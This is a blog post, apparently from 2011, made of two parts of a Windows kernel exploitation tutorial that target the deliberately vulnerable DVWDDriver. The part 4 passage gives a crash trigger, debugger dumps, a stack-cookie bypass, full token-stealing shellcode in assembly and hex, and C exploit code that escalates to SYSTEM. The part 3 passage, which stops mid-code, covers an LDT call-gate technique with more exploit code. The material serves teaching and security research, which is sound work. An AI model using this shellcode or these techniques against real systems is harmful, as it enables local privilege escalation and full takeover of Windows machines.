dimanche 17 juillet 2011

Windows Kernel Exploitation Basics - Part 4 : Stack-based Buffer Overflow exploitation (bypassing cookie)



In this article, we'll exploit the Stack-based Buffer Overflow that is present into the DVWDDriver when we pass a too big buffer to the driver with the DEVICEIO_DVWD_STACKOVERFLOW IOCTL. The concept of buffer overflow in kernelland is the same as in userland. Basically, we've got a buffer that sits in kernelland and we are able to overflow it, here because the function RtlCopyMemory() is not well used as we've seen in the first article of that serie.
First of all, we'll see how to detect such a vulnerability in a driver and then we'll go thru the exploitation process, based on the information given in the book "A guide to Kernel Exploitation" and some papers on that topic that have been released.

1. Triggering the vulnerability

In order to trigger the vulnerability, I've made this small piece of code:
/* IOCTL */
#define DEVICEIO_DVWD_STACKOVERFLOW  CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 

int main(int argc, char *argv[]) {
 
 char junk[512];
 HANDLE hDevice;
 
 printf("--[ Fuzz IOCTL DEVICEIO_DVWD_STACKOVERFLOW ---------------------------\n");
 
 printf("[~] Building junk data to send to the driver...\n");
 memset(junk, 'A', 511);
 junk[511] = '\0';
 
 printf("[~] Open an handle to the driver DVWD...\n");
 hDevice = CreateFile("\\\\.\\DVWD", 
    GENERIC_READ | GENERIC_WRITE, 
    FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, 
    NULL, 
    OPEN_EXISTING, 
    0, 
    NULL);
 printf("\tHandle: %p\n",hDevice);
 getch();
 
 printf("[~] Send IOCTL DEVICEIO_DVWD_STACKOVERFLOW with junk data...\n");
 DeviceIoControl(hDevice, DEVICEIO_DVWD_STACKOVERFLOW, &junk, strlen(junk), NULL, 0, NULL, NULL);

 
 CloseHandle(hDevice);
 return 0;
}

The code is straightforward, it just sends a 512-byte buffer of junk data (actually 511 'A' + '\0'). This should be really enough to overflow the buffer used by the driver, which is only 64-byte length =)
Okay, so let's compile and run the previous code, here's what we get:


BOUM ! A nice Blue Screen Of Death !

Now, we'll attach the Windows VM used for the tests to a remote kernel debugger, that is actually running in another Windows VM. All the details about how to set up remote debugging using VMWare are given in the article [1].

We run the code again, and the Windows VM freezes after sending the buffer to the driver:



... Meanwhile, the remote kernel debugger detects the "fatal system error":

*** Fatal System Error: 0x000000f7
                       (0xB497BD51,0xF786C6EA,0x08793915,0x00000000)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

To have more information (a dump), we type !analyze -v, and we get:

kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

DRIVER_OVERRAN_STACK_BUFFER (f7)
A driver has overrun a stack-based buffer.  This overrun could potentially
allow a malicious user to gain control of this machine.
DESCRIPTION
A driver overran a stack-based buffer (or local variable) in a way that would
have overwritten the function's return address and jumped back to an arbitrary
address when the function returned.  This is the classic "buffer overrun"
hacking attack and the system has been brought down to prevent a malicious user
from gaining complete control of it.
Do a kb to get a stack backtrace -- the last routine on the stack before the
buffer overrun handlers and bugcheck call is the one that overran its local
variable(s).
Arguments:
Arg1: b497bd51, Actual security check cookie from the stack
Arg2: f786c6ea, Expected security check cookie
Arg3: 08793915, Complement of the expected security check cookie
Arg4: 00000000, zero

Debugging Details:
------------------


DEFAULT_BUCKET_ID:  GS_FALSE_POSITIVE_MISSING_GSFRAME

SECURITY_COOKIE:  Expected f786c6ea found b497bd51

BUGCHECK_STR:  0xF7

PROCESS_NAME:  fuzzIOCTL.EXE

CURRENT_IRQL:  0

LAST_CONTROL_TRANSFER:  from 80825b5b to 8086cf70

STACK_TEXT:
f5d6f770 80825b5b 00000003 b497bd51 00000000 nt!RtlpBreakWithStatusInstruction
f5d6f7bc 80826a4f 00000003 000001ff 0012fcdc nt!KiBugCheckDebugBreak+0x19
f5d6fb54 80826de7 000000f7 b497bd51 f786c6ea nt!KeBugCheck2+0x5d1
f5d6fb74 f7858662 000000f7 b497bd51 f786c6ea nt!KeBugCheckEx+0x1b
WARNING: Stack unwind information not available. Following frames may be wrong.
f5d6fb94 f7858316 f785808c 02503afa 82499078 DVWDDriver!DvwdHandleIoctlStackOverflow+0x5ce
f5d6fc10 41414141 41414141 41414141 41414141 DVWDDriver!DvwdHandleIoctlStackOverflow+0x282
f5d6fc14 41414141 41414141 41414141 41414141 0x41414141
f5d6fc18 41414141 41414141 41414141 41414141 0x41414141
[...]
f5d6fd20 41414141 41414141 41414141 41414141 0x41414141
f5d6fd24 41414141 41414141 41414141 41414141 0x41414141


STACK_COMMAND:  kb

FOLLOWUP_IP:
DVWDDriver!DvwdHandleIoctlStackOverflow+5ce
f7858662 cc              int     3

SYMBOL_STACK_INDEX:  4

SYMBOL_NAME:  DVWDDriver!DvwdHandleIoctlStackOverflow+5ce

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: DVWDDriver

IMAGE_NAME:  DVWDDriver.sys

DEBUG_FLR_IMAGE_TIMESTAMP:  4e08f4d5

FAILURE_BUCKET_ID:  0xF7_MISSING_GSFRAME_DVWDDriver!DvwdHandleIoctlStackOverflow+5ce

BUCKET_ID:  0xF7_MISSING_GSFRAME_DVWDDriver!DvwdHandleIoctlStackOverflow+5ce

So, this is the proof that the kernel stack has been overflowed. We can see all our 'A's (0x41) in the dump of the stack at the time of the crash. But, what is important to notice here is the error message: DRIVER_OVERRAN_STACK_BUFFER (f7) which means that the stack overflow has been directly detected by the kernel. This error confirms that a Stack-Cookie - also called a Stack-Canary - is used in order to avoid stack overflow... well, to try to avoid it =). The principle is the same as in userland with the /GS flag available in the linker of MS Visual Studio. Basically, a security cookie (a pseudo-random 4-byte value) is put on the stack between the saved value of EBP and local variables, so that we have to overflow this value if we want to reach and to overflow the saved EIP value. And of course, in the epilog of the function, the security cookie value is checked against the original value (expected value). If they don't match, the fatal error we're in front of is triggered !

2. Stack-Canary ?

If we disassemble the vulnerable function, here is what we can see:


In the prologue of the function, there is a call to __SEH_prolog4_GS ; this is a function used to:
  • Setup the exception handler block (EXCEPTION_REGISTRATION_RECORD) corresponding to the __try { } __except { } written in the function,
  • Setup the Stack-Canary

Moreover, in the epilog of the function, we can see a call to __SEH_epilog4_GS ; this is a function that retrieves the current value of the Stack-Canary and calls the __security_check_cookie() function. This last function is aimed to compare the current value with the expected value of the Stack-Canary. This expected value (symbol: __security_cookie) is stored in the .data segment. If the values don't match, the OS crashes in the same way as during the previous test.



3. How to bypass the Stack-Canary in KernelLand ?

In order to bypass the Stack-Canary, the goal is to trigger an exception before the check of the cookie, that's to say before the call to the __security_check_cookie() function. In userland, the typical way to do it is by sending a large buffer that will write above the stack limit, till we reach an unmapped page in order to spark a memory fault. However, it doesn't work in kernelland because memory fault exceptions that occur in kernel memory areas are not handled by exception handlers, but only crash the OS (BSOD).

So, the idea is to generate a memory fault exception due to the access of an unmapped page in userland, not in kernelland. To do so, we'll create a mapped memory area (anonymous map) using CreateFileMapping() (see [1]) and MapViewOfFileEx() (see [2]) API calls. Then we fill this area with the address of the shellcode we'll write later on.
It's important to understand that we pass a pointer to a user-space buffer, and its size, to the driver when we send a DEVICEIO_DVWD_STACKOVERFLOW IOCTL. The trick is to adjust the pointer to the buffer in such a way that the end of the buffer will sit in the unmapped page that follows. It's actually sufficient to put only the last 4 bytes of the buffer outside the anonymous map. This is well illustrated in the book of DVWDDriver's authors with this figure:



By doing so, when the driver will read the content of the buffer (for the copy), it will end up trying to read an unmapped memory area in userland. Therefore an exception will be triggered, and it will be possible to bypass the Stack-Canary by using SEH exploitation in kernelland.


4. Shellcoding

I've decided not to use the same shellcode as the one given in the DVWDExploit for my tests. Instead of patching the SID into the Access Token of the exploit process, I would like to use another privilege escalation method: to steal the Access Token of a process that is running with Owner SID == NT AUTHORITY\SYSTEM SID, and overwrite the Access Token of the exploit process by the stolen one.

I haven't reinvented the wheel to write the shellcode, I just referred to the two following great papers: [2] and [3]. The shellcode I've used is directly taken/adapted from those papers. The algorithm is the following:

  1. Find _KTHREAD structure corresponding to the current thread, into _KPRCB
  2. Find _EPROCESS structure corresponding to the current process, into _KTHREAD
  3. Look for _EPROCESS corresponding to the process with PID=4 (UniqueProcessId = 4) ; this is the "System" process that always has SID = NT AUTHORITY\SYSTEM SID.
  4. Retrieve the address of the Token of that process
  5. Look for _EPROCESS corresponding to the process we want to escalate
  6. Replace the Token of that process with the Token of the "System" process
  7. Return to userland using SYSEXIT instruction. Before calling SYSEXIT, we set the registers as it is explained in [2] in order to directly jump to our payload in userland that will run with full privileges.

The first step consists in finding the good offsets in the kernel structures for Windows Server 2003 SP2. To do so, we're going to dig into those structures using kd:

kd> r
eax=00000001 ebx=000063a3 ecx=80896d4c edx=000002f8 esi=00000000 edi=ed8fcfa8
eip=8086cf70 esp=80894560 ebp=80894570 iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000202

kd> dg @fs
                                  P Si Gr Pr Lo
Sel    Base     Limit     Type    l ze an es ng Flags
---- -------- -------- ---------- - -- -- -- -- --------
0030 ffdff000 00001fff Data RW    0 Bg Pg P  Nl 00000c92

kd> dt nt!_kpcr ffdff000
   [...]
   +0x120 PrcbData         : _KPRCB
   
kd> dt nt!_kprcb ffdff000+0x120
   +0x000 MinorVersion     : 1
   +0x002 MajorVersion     : 1
   +0x004 CurrentThread    : 0x80896e40 _KTHREAD
   +0x008 NextThread       : (null)
   +0x00c IdleThread       : 0x80896e40 _KTHREAD
   [...]


kd> dt nt!_kthread 0x80896e40
   +0x000 Header           : _DISPATCHER_HEADER
   +0x010 MutantListHead   : _LIST_ENTRY [ 0x80896e50 - 0x80896e50 ]
   +0x018 InitialStack     : 0x808948b0 Void
   +0x01c StackLimit       : 0x808918b0 Void
   +0x020 KernelStack      : 0x808945fc Void
   +0x024 ThreadLock       : 0
   +0x028 ApcState         : _KAPC_STATE
   +0x028 ApcStateFill     : [23]  "hn???"
   +0x03f ApcQueueable     : 0x1 ''
   [...]
   
   
kd> dt nt!_kapc_state 0x80896e40+0x28
   +0x000 ApcListHead      : [2] _LIST_ENTRY [ 0x80896e68 - 0x80896e68 ]
   +0x010 Process          : 0x808970c0 _KPROCESS
   +0x014 KernelApcInProgress : 0 ''
   +0x015 KernelApcPending : 0 ''
   +0x016 UserApcPending   : 0 ''
   
kd> dt nt!_eprocess 0x808970c0
   +0x000 Pcb              : _KPROCESS
   +0x078 ProcessLock      : _EX_PUSH_LOCK
   +0x080 CreateTime       : _LARGE_INTEGER 0x0
   +0x088 ExitTime         : _LARGE_INTEGER 0x0
   +0x090 RundownProtect   : _EX_RUNDOWN_REF
   +0x094 UniqueProcessId  : (null)
   +0x098 ActiveProcessLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0x0a0 QuotaUsage       : [3] 0
   +0x0ac QuotaPeak        : [3] 0
   +0x0b8 CommitCharge     : 0
   +0x0bc PeakVirtualSize  : 0
   +0x0c0 VirtualSize      : 0
   +0x0c4 SessionProcessLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0x0cc DebugPort        : (null)
   +0x0d0 ExceptionPort    : (null)
   +0x0d4 ObjectTable      : 0xe1000c60 _HANDLE_TABLE
   +0x0d8 Token            : _EX_FAST_REF
   +0x0dc WorkingSetPage   : 0x17f40
   [...]
   
kd> dt nt!_list_entry
   +0x000 Flink            : Ptr32 _LIST_ENTRY
   +0x004 Blink            : Ptr32 _LIST_ENTRY

kd> dt nt!_token -r1 @@(0xe1001727 & ~7)
   +0x000 TokenSource      : _TOKEN_SOURCE
      +0x000 SourceName       : [8]  "*SYSTEM*"
      +0x008 SourceIdentifier : _LUID
   +0x010 TokenId          : _LUID
      +0x000 LowPart          : 0x3ea
      +0x004 HighPart         : 0n0
   +0x018 AuthenticationId : _LUID
      +0x000 LowPart          : 0x3e7
      +0x004 HighPart         : 0n0
   +0x020 ParentTokenId    : _LUID
      +0x000 LowPart          : 0
      +0x004 HighPart         : 0n0
   +0x028 ExpirationTime   : _LARGE_INTEGER 0x6207526`b64ceb90
      +0x000 LowPart          : 0xb64ceb90
      +0x004 HighPart         : 0n102790438
      +0x000 u                : __unnamed
      +0x000 QuadPart         : 0n441481572610010000
   [...]

From this, we can deduce the following offsets that will be useful for writing the shellcode for Windows Server 2003 SP2:

  • _KTHREAD: located at fs:[0x124] (where the FS segment descriptor points to _KPCR)
  • _EPROCESS: 0x38 from the beginning of _KTHREAD
  • _EPROCESS.ActiveProcessLinks: it is a double-linked list that links all the _EPROCESS structures (for all the processes). It's located at the offset 0x98 from the beginning of _EPROCESS. It also corresponds to the pointer to the next element (Flink) in this double-linked list.
  • _EPROCESS.UniqueProcessId: It is the PID of the corresponding process. It is located at the offset 0x94 from the beginning of _EPROCESS.
  • _EPROCESS.Token: This is the structure that contains the Access Token. The offset in _EPROCESS is 0xD8. Note that it must be aligned by 8.
.486
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
assume fs:nothing

.code

shellcode:

; ----------------------------------------------------------------------
;                  Shellcode for Windows Server 2k3
; ----------------------------------------------------------------------

; Offsets
WIN2K3_KTHREAD_OFFSET   equ 124h    ; nt!_KPCR.PcrbData.CurrentThread
WIN2K3_EPROCESS_OFFSET  equ 038h    ; nt!_KTHREAD.ApcState.Process
WIN2K3_FLINK_OFFSET     equ 098h    ; nt!_EPROCESS.ActiveProcessLinks.Flink
WIN2K3_PID_OFFSET       equ 094h    ; nt!_EPROCESS.UniqueProcessId
WIN2K3_TOKEN_OFFSET     equ 0d8h    ; nt!_EPROCESS.Token
WIN2K3_SYS_PID          equ 04h     ; PID Process SYSTEM


pushad                                ; save registers

mov eax, fs:[WIN2K3_KTHREAD_OFFSET]   ; EAX <- current _KTHREAD
mov eax, [eax+WIN2K3_EPROCESS_OFFSET] ; EAX <- current _KPROCESS == _EPROCESS
push eax


mov ebx, WIN2K3_SYS_PID

SearchProcessPidSystem:

mov eax, [eax+WIN2K3_FLINK_OFFSET]    ; EAX <- _EPROCESS.ActiveProcessLinks.Flink
sub eax, WIN2K3_FLINK_OFFSET          ; EAX <- _EPROCESS of the next process
cmp [eax+WIN2K3_PID_OFFSET], ebx      ; UniqueProcessId == SYSTEM PID ?
jne SearchProcessPidSystem            ; if no, retry with the next process...

mov edi, [eax+WIN2K3_TOKEN_OFFSET]    ; EDI <- Token of process with SYSTEM PID
and edi, 0fffffff8h                   ; Must be aligned by 8

pop eax                               ; EAX <- current _EPROCESS 


mov ebx, 41414141h

SearchProcessPidToEscalate:

mov eax, [eax+WIN2K3_FLINK_OFFSET]    ; EAX <- _EPROCESS.ActiveProcessLinks.Flink
sub eax, WIN2K3_FLINK_OFFSET          ; EAX <- _EPROCESS of the next process
cmp [eax+WIN2K3_PID_OFFSET], ebx      ; UniqueProcessId == PID of the process 
                                      ; to escalate ?
jne SearchProcessPidToEscalate        ; if no, retry with the next process...

SwapTokens:

mov [eax+WIN2K3_TOKEN_OFFSET], edi    ; We replace the token of the process 
                                      ; to escalate by the token of the process
                                      ; with SYSTEM PID

PartyIsOver:

popad                                 ; restore registers
mov edx, 11111111h                    ; EIP value after SYSEXIT
mov ecx, 22222222h                    ; ESP value after SYSEXIT
mov eax, 3Bh                          ; FS value in userland (points to _TEB)
db 8Eh, 0E0h                          ; mov fs, ax
db 0Fh, 35h                           ; SYSEXIT

end shellcode

We assemble this asm code with MASM and we retrieve the corresponding sequence of opcodes (Tools > Load Binary File as Hex)... we get:
00000200 :60 64 A1 24 01 00 00 8B - 40 38 50 BB 04 00 00 00
00000210 :8B 80 98 00 00 00 2D 98 - 00 00 00 39 98 94 00 00
00000220 :00 75 ED 8B B8 D8 00 00 - 00 83 E7 F8 58 BB 41 41
00000230 :41 41 8B 80 98 00 00 00 - 2D 98 00 00 00 39 98 94
00000240 :00 00 00 75 ED 89 B8 D8 - 00 00 00 61 BA 11 11 11
00000250 :11 B9 22 22 22 22 B8 3B - 00 00 00 8E E0 0F 35 00

Of course, before using this shellcode, it's necessary to replace the PID value of the process to escalate, the EIP and ESP values after SYSEXIT. We'll do that in the code before sending the buffer.

5. Methodology of exploitation

The exploitation process is the following:

  1. Create an executable memory area and put the previous shellcode (for swapping tokens) in that area.
  2. Similarly, create an executable memory area and put the shellcode that must be executed after the privilege escalation (the payload)
  3. Update the first shellcode with: PID of the process to escalate, EIP to use after SYSEXIT, ESP to use after SYSEXIT. The method is taken from [4].
  4. Create an anonymous map for our buffer
  5. Fill this map with the address of the first shellcode
  6. Adjust the pointer to the buffer in such a way that the last 4 bytes are in an unmapped memory area
  7. Send the buffer to the driver with the DEVICEIO_DVWD_STACKOVERFLOW IOCTL.

6. Exploit code

Here is the main function of the exploit. It should be quite straightforward after the previous explanations.

VOID TriggerOverflow32(VOID) {

 HANDLE hFile;
 DWORD dwReturn;
 UCHAR* map;
 UCHAR *uBuff = NULL;
 BOOL ret;
 ULONG_PTR pShellcode;

 // Load the Kernel Executive ntoskrnl.exe in userland and get some 
 // symbol's kernel address
 if(LoadAndGetKernelBase() == FALSE)
  return;

 
 // Put the shellcodes in executable memory
 mapShellcodeSwapTokens = (UCHAR *)CreateUspaceExecMapping(1);
 mapShellcodePayload    = (UCHAR *)CreateUspaceExecMapping(1);

 memset(mapShellcodeSwapTokens, '\x00', GlobalInfo.dwAllocationGranularity);
 memset(mapShellcodePayload, '\x00', GlobalInfo.dwAllocationGranularity);

 RtlCopyMemory(mapShellcodeSwapTokens, ShellcodeSwapTokens, sizeof(ShellcodeSwapTokens));
 RtlCopyMemory(mapShellcodePayload, ShellcodePayload, sizeof(ShellcodePayload));


 // Added
 printf("[~] Update Shellcode with PID of the process...\n");
 if(!MajShellcodePid(L"DVWDExploit.exe")) {
  printf("[!] An error occured, exitting...\n");
  return;
 }

 printf("[~] Update Shellcode with EIP to use after SYSEXIT...\n");
 if(!MajShellcodeEip()) {
  printf("[!] An error occured, exitting...\n");
  return;
 }

 printf("[~] Update Shellcode with ESP to use after SYSEXIT...\n");
 if(!MajShellcodeEsp()) {
  printf("[!] An error occured, exitting...\n");
  return;
 }
 
 printf("[~] Retrieve the address of the shellcode and build the buffer...\n");

 // Create an anonymous map
 map = (UCHAR *)CreateUspaceMapping(1);
 // Retrieve the address of the shellcode
 pShellcode = (ULONG_PTR)mapShellcodeSwapTokens;
 
 // We fill the map with the address of our shellcode (the address is repeated)
 FillMap(map, pShellcode, GlobalInfo.dwAllocationGranularity);

 // We adjust the pointer to the buffer (size = BUFF_SIZE) in such a way that the 
 // last 4 bytes are in an unmapped memory area
 uBuff = map + GlobalInfo.dwAllocationGranularity - (BUFF_SIZE-sizeof(ULONG_PTR));

 // Now, we send our buffer to the driver and trigger the overflow
 hFile = CreateFile(_T("\\\\.\\DVWD"), GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL);
 deviceHandle = hFile;

 if(hFile != INVALID_HANDLE_VALUE)
  ret = DeviceIoControl(hFile, DEVICEIO_DVWD_STACKOVERFLOW, uBuff, BUFF_SIZE, NULL, 0, &dwReturn, NULL);

 // If you get here the vulnerability has not been triggered ...
 printf("[!] Stack overflow has not been triggered, maybe the driver has not been loaded ?\n");
 return;
}

6. All your base are belong to us


For testing purpose, I've put a simple windows/exec calc.exe shellcode from Metaploit for the payload. However, we can put what we want...


Our calc.exe is running with NT AUTHORITY\SYSTEM privileges, so it means the privilege escalation has succeeded and then, the payload has been well executed.


References

[1] CreateFileMapping() function
http://msdn.microsoft.com/en-us/library/aa366537(v=vs.85).aspx

[2] MapViewOfFileEx() function 
http://msdn.microsoft.com/en-us/library/aa366763(v=VS.85).aspx

[3] Remote Debugging using VMWare
http://www.catch22.net/tuts/vmware

[4] Local Stack Overflow in Windows Kernel, by Heurs
http://www.ghostsinthestack.org/article-29-local-stack-overflow-in-windows-kernel.html

[5] Exploiting Windows Device Drivers, by Piotr Bania
http://pb.specialised.info/all/articles/ewdd.pdf

Windows Kernel Exploitation Basics - Part 3 : Arbitrary Memory Overwrite exploitation using LDT



In the previous post, we've seen an exploitation of the write-what-where vulnerability in DVWDDriver based on the overwriting of a pointer located into the kernel dispatch table HalDispatchTable. This technique relies on an undocumented syscall, and so the problem with such a technique is that it is not guaranteed to remain in the same form in the next system updates as it is well pointed out in the great paper [1]. Instead, the new technique detailed in this post is based on the hardware-specific structures GDT and LDT that are more likely to remain the same across the different Windows versions. This is another method that is briefly presented in the book "A guide to Kernel Exploitation". First of all, background about GDT and LDT is required, so we'll take our Intel Manual and see that now =)

1. Windows GDT and LDT

According to the Intel Manual [2], Segmentation is implemented using Segment Selector which is a 16-bit value. Actually, a Logical Address is composed of:
  • An offset address, which is a 32-bits value,
  • A Segment Selector, which is a 16-bits value.
Because a figure permits to avoid a long speech, here's a global overview of Segmentation and Paging mechanisms (Logical address -> Linear address -> Physical address):



    The previous figure shows how the logical address is translated into a linear address thanks to Segmentation. Then, we can see that the Paging mechanism comes in play. Basically, it consists in translating the linear address into physical address. It is actually an Intel optional feature but if not used, linear address == physical address. Windows uses Paging and so, the linear address is just another structure split into 3 subfields. The values of those subfields are used as offsets into arrays in order to get the physical address.

    Moreover, we can see that the Segment Selector references an entry in a table and this entry actually describes a segment (Segment Descriptor) in linear address space: this table is the GDT. Ok, but how's really working and wtf is that LDT ?! Let's go back to our Intel Manual... =)

    We learn that GDT (Global Descriptor Table) and LDT (Local Descriptor Table) are the 2 kinds of Segment Descriptors tables. We can also see this awesome figure:



    Having a GDT is mandatory for a system, every system must create one when it starts up. There is a single GDT per processor for the entire system (that's why it's a "global" table) and that can be shared by all tasks on the system. Using a LDT is actually optional ; it can nevertheless be used by a single task or a group of tasks that are in relation. A LDT is defined as a single GDT entry and it is specific to a process, which means that the entry is replaced into the GDT during a process-context switch.

    To give more details, the GDT normally contains:
    • A pair of kernel-mode code and data Segment Descriptors, with DPL = 0 (the DPL defines the privilege level of the segment being referenced, ie. the ring)
    • A pair of user-mode code and data Segment Descriptors, with DPL = 3
    • One TSS (Task State Segment), with DPL = 0. See [3]
    • 3 Additional data segment entries.
    • An optional LDT entry
    By default, a new process doesn't have any LDT defined, however it can be allocated if the process sends a demand to create it. If a process has a corresponding LDT, a pointer can be found in the LdtDescriptor field of the kernel structure _KPROCESS corresponding to the process in question:

    kd> dt nt!_kprocess
       +0x000 Header           : _DISPATCHER_HEADER
       +0x010 ProfileListHead  : _LIST_ENTRY
       +0x018 DirectoryTableBase : [2] Uint4B
       +0x020 LdtDescriptor    : _KGDTENTRY
       +0x028 Int21Descriptor  : _KIDTENTRY
       [...]
    

    2. Call-Gate

    A Call-Gate permits to access code segments with different privilege levels:
    "Call-Gates facilitate controlled transfers of program control between different privilege levels. They are typically used only in operating systems or executives that use the privilege-level mechanism" (Intel Manual Vol. 3A & 3B [2], p. 201).

    A Call-Gate is a possible entry into GDT or LDT. It is a special sort of descriptor called a Call-Gate Descriptor. It's the same size as a Segment Descriptor (8 bytes), but some fields aren't organized in the same way. The figure below is taken from [1] and clearly shows the differences:



    In practice, a Call-Gate is useful in order to jump to a code located to a different segment and running with different privileges (ring). Here's how things are working when we're calling a Call-Gate:
    1. The processor accesses the Call-Gate Descriptor,
    2. It locates the Code Segment Descriptor we finally want to access, by using the Segment Selector contained into the Call-Gate Descriptor,
    3. It retrieves the Base Address contained into the Code Segment Descriptor and adds to it the offset value contained into the Call-Gate Descriptor.
    4. The result is the linear address of the code we want to access (Code linear address = Base Address + Offset).

    The article [4] (in french) explains how we can add a Call-Gate that permits to run code in Ring0 from Ring3. So, I'll not repeat all what it's said in that great article, but just what is useful for us right now:

    • The "Segment Selector" field must refer to the Segment Descriptor under which our payload will be executed. Because we want to run it with full privileges in Ring0, we'll refer to the Kernel Code Segment (CS) Descriptor. The right value is 0x0008.
    • The "DPL" field must be equal to 3 if we want to be able to access the Call-Gate from the userland.
    • The "Offset" field must be the address of the code we want to execute.
    • The "Type" field must be equal to 12 for Call-Gate Descriptor.
    After that, we need to know how to call our Call-Gate...
    For that, we'll use the x86 instruction FAR CALL (0x9A). It's different from a classic CALL because we must specify an offset (32-bits) AND a Segment Selector (16-bits). In our case, we just need to put the right value for the Segment Selector, and we just have to leave the index at 0x00000000. Indeed, here we're doing like a call in two times; I mean the first call is aimed to reach the Call-Gate Descriptor and then the Call-Gate Descriptor points to the code we want to execute. Let's see how is built a Segment Selector:
    So:
    • Bits 0,1: we call the Call-Gate from userland, so we'll put the value 11 (3 in decimal for Ring3) here;
    • Bit 2: we'll put the value 1 because we'll put our Call-Gate Descriptor into LDT;
    • Bits 3..15: this is the index into GDT/LDT (here into LDT). We'll put our Call-Gate at the first position into the LDT, so we'll put the value 0 here.

    3. Methodology of exploitation

    Now that we've got the background about GDT and LDT we can move on to the exploitation...
    Basically, the exploitation consists in creating a new LDT. Then, we add a new entry into that LDT - just one entry - a Call-Gate Descriptor by putting the right values in the fields as it was explained before...


    And then, we need to use the write-what-where vulnerability in order to overwrite the LDT descriptor into the GDT by a descriptor corresponding to the fake LDT that has been previously created. Here:
    • what = LDT descriptor of the fake LDT,
    • where = location of the LDT descriptor into the GDT. The LDT is represented by a KGDTENTRY structure called LdtDescriptor, that is an entry into the _KPROCESS structure (structure used by the kernel to store information about a specific process) as we've seen before. So, we can get the address of where we want to write by retrieving the address of _KPROCESS (== address of _EPROCESS) and adding to it the right offset value (0x20 for Windows Server 2003 SP2). 
    Finally, we can call our Call-Gate by making a FAR CALL on the first (and only) entry into the LDT of the current process. This will permit to jump to our shellcode.

    4. Shellcoding

    Okay, we've briefly seen how the exploitation is working. We will re-use the shellcode used in the previous article about exploiting write-what-where vulnerabilities with HalDispatchTable. But there is an additional problem here... we need to be able to return from the Call-Gate after the execution of our payload. A FAR CALL will be made to jump to the Call-Gate, that's to say the segment where EIP is pointing will change, and so we need to make a FAR RET (0xCB) and not a simple RET after the execution. By doing so, we will be able to move on to the next instruction into our exploit program.

    Moreover, it's important to remember that the FS segment descriptor is pointing to the KPCR structure (Kernel Processor Control Region) in kernel-mode, but not in user-mode where it is pointing to the TEB structure (Thread Execution Block). Indeed:
    • In Kernel-Mode, FS=0x30
    • In User-Mode, FS=0x3B
    Therefore, we have to correctly set FS to the value 0x30 before executing our shellcode in kernelland, and then we must put its value back to 0x3B before returning.

    This is for the two previous reasons that the authors of the DVWDExploit have written a wrapper (ReturnFromGate) in ASM that performs those operations. This is the address of this wrapper that must be put into the Offset field of the Call-Gate Descriptor.

    5. Exploitation in details

    Okay, we've got all the elements to fully understand the exploit. Here is how it works:
    1. Retrieve the address of the payload that will be executed in Kernel-mode (named KernelPayload), that's to say the code to patch the current process' Access Token.
    2. Retrieve the address of the _KPROCESS structure.
    3. Retrieve the address of the LDT descriptor into the GDT, located at address of _KPROCESS + offset (0x20)
    4. Create a new LDT using the ZwSetInformationProcess() syscall within ntdll.dll. This is done in the function called SetLDTEnv().
    5. Put the address KernelPayload into the wrapper ReturnFromGate to be able to call the shellcode from it. Then, put this wrapper into executable memory.
    6. Build the Call-Gate Descriptor in the function called PrepareCallGate32(). Well, we've already seen how to correctly fill the fields of the Call-Gate in order to be able to run code in Ring0 from Ring3.
    7. Build the LDT Descriptor that corresponds to the previously created LDT. This is done by the function called PrepareLDTDescriptor32()
    8. Overwrite the LDT descriptor into the GDT by the one corresponding to the fake LDT that has been previously created, by using the vulnerability:
      • Store the new LDT descriptor into the GlobalOverwriteStruct thanks to the DVWDDriver's IOCTL DEVICEIO_DVWD_STORE.
      • Write this new LDT descriptor - contained into GlobalOverwriteStruct - at the location of the existing LDT descriptor into GDT, thanks to the DVWDDriver's IOCTL DEVICEIO_DVWD_OVERWRITE.
    9. Then, we need to force a process context switch. Indeed, the LDT Segment Descriptor into the GDT is updated only after a context switch. To do so, we just sleep for some time.
    10. Finally, we make our FAR CALL to the Call-Gate. That will trigger the execution of the wrapper and then of our shellcode in kernel-mode.
    11. When we return from our shellcode, the process is running with Owner SID = NT AUTHORITY\SYSTEM, so we can do what we want ! 
    A figure might help to understand... =) 




    6. Exploit code

    Here is a code snippet from DVWDExploit with many comments I've added. The full code is available in the archive:

    // ----------------------------------------------------------------------------
    // Arbitrary Memory Overwrite exploitation ------------------------------------
    // ---- Method using LDT  -----------------------------------------------------
    // ----------------------------------------------------------------------------
    
    
    typedef NTSTATUS (WINAPI *_ZwSetInformationProcess)(HANDLE ProcessHandle, 
                           PROCESS_INFORMATION_CLASS ProcessInformationClass,  
                           PPROCESS_LDT_INFORMATION ProcessInformation,
                           ULONG ProcessInformationLength);    
    
    // Fill the Call-Gate Descriptor -------------------------------------------------
    VOID PrepareCallGate32(PCALL_GATE32 pGate, PVOID Payload) {
    
     ULONG_PTR IPayload = (ULONG_PTR)Payload;
    
     RtlZeroMemory(pGate, sizeof(CALL_GATE32));
     
     pGate->Fields.OffsetHigh   = (IPayload & 0xFFFF0000) >> 16;
     pGate->Fields.OffsetLow    = (IPayload & 0x0000FFFF);
     pGate->Fields.Type     = 12;   // Gate Descriptor
     pGate->Fields.Param    = 0;
     pGate->Fields.Present    = 1;
     pGate->Fields.SegmentSelector  = 1 << 3;  // Kernel Code Segment Selector
     pGate->Fields.Dpl     = 3;
    }
    
    // Setup the LDT descriptor ------------------------------------------------------
    VOID PrepareLDTDescriptor32(PLDT_ENTRY pLDTDesc, PVOID LDTBasePtr) {
    
     ULONG_PTR LDTBase = (ULONG_PTR)LDTBasePtr;
    
     RtlZeroMemory(pLDTDesc, sizeof(LDT_ENTRY));
     
     pLDTDesc->BaseLow     = LDTBase & 0x0000FFFF;
